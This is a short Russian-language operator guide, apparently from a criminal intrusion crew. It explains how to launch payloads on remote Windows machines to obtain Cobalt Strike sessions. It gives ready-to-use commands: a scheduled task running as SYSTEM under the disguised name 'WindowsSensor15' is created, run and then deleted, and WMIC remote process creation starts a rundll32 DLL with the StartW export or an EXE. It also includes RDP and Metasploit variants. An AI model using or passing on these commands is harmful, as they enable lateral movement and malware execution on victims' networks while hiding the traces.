Команды для запуска пелойда, что бы подтянуть сессию в кобальт
1)shell SCHTASKS /s MS040926754153 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00
2)shell SCHTASKS /s MS040926754153 /run /TN "WindowsSensor15"
3)shell schtasks /S MS040926754153 /TN "WindowsSensor15" /DELETE /F
вместо
MS040926754153
вставляешь
ипак тачки
по очереди команды долбишь
1) создание таска с пейлоадом
2) врубание
3) удаление


Запуск ВМИКОМ  им пользуемся чаще
1)если это ДЛЛ, то 
shell wmic /node:192.168.104.13 process call create "rundll32.exe C:\ProgramData\x64.dll StartW"

Соответсвенно где айпи, вставляем айпи машины на котрую имеем доступ, дальше идет путь и название нашей длл, думаю синтаксис понятен

Если вы находитесь на РДП > открыаем CMD от администратора и rundll32.exe C:\ProgramData\x64.dll,StartW  сотвественно путь можете указать любой, в соотвествии где лежит ваша длл


Для EXE формата или формата  .bat запуск ВМИКОМ такой 

shell wmic /node:10.28.0.3 process call create "C:\ProgramData\j1.exe"



Так же можно загружать и запускать через метасплойт, но мы сейчас крайне редко пользуемся запуском и загрузкой при помщи этого интсрумента, так как в последней версии работает не коректно